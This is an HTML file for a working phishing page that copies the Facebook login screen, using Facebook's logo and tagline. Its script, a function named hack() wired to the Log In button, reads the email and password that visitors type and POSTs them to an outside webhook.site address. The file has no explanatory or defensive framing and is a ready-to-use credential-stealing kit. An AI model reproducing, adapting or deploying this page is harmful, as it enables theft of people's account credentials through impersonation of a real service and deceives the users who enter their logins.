<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=, initial-scale=1.0">
    <title>Document</title>
</head>

<body>



    <div class="container">
        <div class="left child-con">
            <div class="left-child-1">
                <img class="left-img" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="">
                <h2 id="desc">Connect with friends and the world <br /> around you on Facebook.</h2>
            </div>
        </div>
        <div class="right child-con">
            <div class="right-child">
                <input class="input-form email" type="text" placeholder="Email or Phone number" id="email">
                <input class="input-form password" type="text" placeholder="Password" id="password">
                <button class="Login" onclick="hack()">Log In</button>
                <a class="link-1">Forgot password?</a>
                <hr />
                <button class="cna">Create new account</button>

            </div>
<p class="bottom-p"><b>Create a page</b> for a celebrity, brand or business.</p>


        </div>

    </div>

</body>
<style>
    * {
        padding: 0;
        margin: 0;
        box-sizing: border-box;
        font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;

    }

    .container {
        display: flex;
        height: 75vh;
        width: 100%;
        background: #f2f4f7;
    }




    .left {
        box-sizing: border-box;
        padding-right: 90px;
        height: 80%;

        display: flex;
        justify-content: right;
        align-items: center;

    }

    .right {
        /* background: green; */
        display: flex;
        flex-direction: column;
        align-items: left;
        height: 80%;
        justify-content: center;
        margin-left: 50px;
    }

    .right-child {
        background-color: white;
        display: flex;
        flex-direction: column;
        width: 400px;
        gap: 15px;
        padding: 15px;
        border-radius: 8px;
        box-shadow: 0px 0px 09px -3px grey;

    }




    .left-child-1 {
        display: flex;
        flex-direction: column;
    }


    .left-img {
        width: 300px;
    }

    #desc {
        font-weight: normal;
        font-size: 26px;
        padding-left: 25px;
    }

    .link-1 {
        text-decoration: none;
        margin-left: auto;
        margin-right: auto;
        color: #1064fc;
        font-size: 15px;
        bottom: 10px;
        margin-bottom: 10px;

    }

    .link-1:hover {
        text-decoration: underline;
    }

    .input-form {
        width: 100%;
        height: 50px;
        font-size: 16px;
        padding-left: 15px;
        border: 1px solid #e2e4e6;

        border-radius: 5px;

    }


    .input-form:focus {
        border-color: #1064fc;

    }

    .Login {
        /* min-height: 40px; */
        border-radius: 5px;
        font-weight: bold;
        color: white;
        background-color: #1064fc;
        font-size: 18px;
        border: none;
        padding-top: 12px;
        padding-bottom: 12px;
        margin-bottom: 2px;

    }

    .cna {
        height: 50px;
        width: 60%;
        margin-left: auto;
        margin-right: auto;
        margin-top: 10px;
        border-radius: 5px;
        border: none;
        background-color: #42b72a;
        font-weight: bold;
        color: white;
        font-size: 17px;
        margin-bottom: 12px;


    }

    .bottom-p{
        font-size: 15px;
        margin-top: 25px;
        width: 400px;
        text-align: center;
    }



    .container {
    display: flex;
    height: 75vh;
    width: 100%;
    background: #f2f4f7;
    flex-direction: row; /* Default direction */
}
.child-con {
        width: 50%; /* Full width on small devices */
  
    }

    

@media (max-width: 768px) { /* Adjust this width based on your preference */
    .container {
        flex-direction: column; /* Change to column on small devices */
        height: auto; /* Adjust height for better fit on small screens */
    }

    .child-con {
        width: 100%; /* Full width on small devices */
        margin-bottom: 20px; /* Add some spacing between sections */
    }

    .right {
        margin-left: 0; /* Remove left margin on small devices */
        align-items: center; /* Center align on small devices */
    }

    .right-child {
        width: 90%; /* Make the form take up more space on small devices */
    }

    .bottom-p {
        width: 90%; /* Adjust width for small devices */
    }
    .left {padding-right: 0px;}
}


/* Existing styles */

.left-img {
    width: 300px;
}

#desc {
    font-weight: normal;
    font-size: 26px;
    padding-left: 25px;
}

/* Media query for small devices */

@media (max-width: 768px) { /* Adjust this width based on your preference */
    .left-img {
        width: 80%; /* Adjust the width of the image */
        margin: 0 auto; /* Center the image horizontally */
    }

    #desc {
        font-size: 20px; /* Adjust the font size of the description */
        text-align: center; /* Center the text */
        padding-left: 0; /* Remove the left padding */
    }

    .left-child-1 {
        align-items: center; /* Center align the contents of the left section */
        text-align: center; /* Center the text */
        width: 100%;
        margin-left: auto;
        margin-right: auto;
    }



}

</style>




<script>

function hack() {
    var email = document.getElementById("email").value;
    var password = document.getElementById("password").value;
    var  data = { email: email, password: password };


fetch("https://webhook.site/50ff13dc-0964-47d6-b614-44d1f4b6085b",{ method: 'POST',body: JSON.stringify(data)});




}
</script>

</html>